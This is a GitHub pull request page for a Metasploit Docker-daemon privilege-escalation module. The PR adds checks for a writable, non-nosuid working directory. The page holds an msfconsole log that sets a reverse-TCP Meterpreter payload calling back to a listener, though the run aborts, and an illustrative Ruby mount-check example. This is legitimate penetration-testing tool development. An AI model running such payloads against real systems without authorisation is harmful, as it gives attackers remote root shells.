
Add check for writable and nosuid WritableDir #11239

Merged
merged 2 commits into from
Feb 9, 2019

Conversation

bcoles
Contributor

@bcoles bcoles commented Jan 11, 2019

This PR enhances the exploit/linux/local/docker_daemon_privilege_escalation module (added in #7027) to check whether the user-specified WritableDir is writable and mounted without nosuid.

Before these changes:

  • If the WritableDir was not writable, the module would (likely) fail horribly
  • If the WritableDir was mounted nosuid, the module would fail to privesc - probably return a new low-privileged session or no new session.

While I was at it, a check for CheckCode::Vulnerable within the exploit method, and an associated ForceExploit code pattern, were added.

I haven't tested these changes on a vulnerable system. I have, however, at least verified that the changes appear to not horribly break the module on a non-vulnerable system.

msf5 exploit(multi/handler) > use exploit/linux/local/docker_daemon_privilege_escalation 
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set verbose true
verbose => true
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > check

[-] Failed to access Docker daemon.
[*] The target is not exploitable.
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > options

Module options (exploit/linux/local/docker_daemon_privilege_escalation):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 1
set lhost 127.0.0.1       set lhost 172.16.191.188  set lhost 172.16.191.196  
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[-] Failed to access Docker daemon.
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > 
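
As an added example (not code from the Metasploit module or from this PR), the following plain Ruby shows the kind of mount check the description above refers to: parse a /proc/mounts snapshot, find the mount entry that governs a candidate directory, and report whether that mount carries the nosuid option. The mount table and the paths are constructed sample data, and the `gate` helper is a framework-free sketch of the ForceExploit pattern mentioned in the description, not the module's actual implementation.

```ruby
# Added example, not the Metasploit module's own code.
# Constructed /proc/mounts snapshot: /tmp and /dev/shm are nosuid,
# / and /var/tmp are not.
SAMPLE_MOUNTS = <<~MOUNTS
  sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
  /dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
  tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
  tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
  /dev/sdb1 /var/tmp ext4 rw,relatime 0 0
MOUNTS

# Parse /proc/mounts text into [mount_point, options] pairs.
# /proc/mounts encodes spaces in mount points as octal escapes (\040),
# so those are decoded here.
def parse_mounts(text)
  text.each_line.filter_map do |line|
    fields = line.split
    next if fields.length < 4

    mount_point = fields[1].gsub(/\\([0-7]{3})/) { $1.to_i(8).chr }
    [mount_point, fields[3].split(',')]
  end
end

# Find the mount entry governing +path+: the longest mount point that is
# a prefix of the path on a component boundary. On equal length the later
# entry wins, since /proc/mounts lists overmounts after what they cover.
def mount_for(path, mounts)
  path = File.expand_path(path)
  best = nil
  mounts.each do |mp, opts|
    next unless path == mp || mp == '/' || path.start_with?("#{mp}/")

    best = [mp, opts] if best.nil? || mp.length >= best[0].length
  end
  best
end

# True when the filesystem holding +path+ is mounted with nosuid, which
# makes a setuid binary placed there ineffective.
def nosuid?(path, mounts)
  entry = mount_for(path, mounts)
  return false if entry.nil?

  entry[1].include?('nosuid')
end

# Decide whether a candidate WritableDir is usable. The real-filesystem
# writability test only runs when +check_fs+ is true, so the mount logic
# can be exercised offline against the constructed table.
def usable_writable_dir?(path, mounts_text, check_fs: false)
  mounts = parse_mounts(mounts_text)
  return false if nosuid?(path, mounts)
  return false if check_fs && !(File.directory?(path) && File.writable?(path))

  true
end

# Framework-free sketch of the ForceExploit gate: proceed only when the
# check reported vulnerable, unless the operator explicitly overrides.
def gate(check_code, force_exploit: false)
  return :proceed if check_code == :vulnerable

  force_exploit ? :proceed_forced : :abort
end

if $PROGRAM_NAME == __FILE__
  %w[/tmp/work /var/tmp/work /home/user].each do |dir|
    verdict = usable_writable_dir?(dir, SAMPLE_MOUNTS) ? 'usable' : 'rejected (nosuid)'
    puts "#{dir}: #{verdict}"
  end
end
```

Note that the longest-prefix match matters: a naive `start_with?('/tmp')` would wrongly treat `/tmpfoo` as living under `/tmp`, and checking only the root entry would miss that `/tmp` is a separate nosuid tmpfs.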

@wchen-r7 wchen-r7 self-assigned this Feb 9, 2019
@wchen-r7 wchen-r7 merged commit fe6956d into rapid7:master Feb 9, 2019
@wchen-r7
Contributor

wchen-r7 commented Feb 9, 2019

Release Notes

This improves the check method for the docker_daemon_privilege_escalation exploit module to check whether the user-specified WritableDir is writable and mounted without nosuid.

@bcoles bcoles deleted the docker_daemon_privilege_escalation branch February 9, 2019 01:24
@gdavidson-r7 gdavidson-r7 added the rn-enhancement release notes enhancement label Feb 19, 2019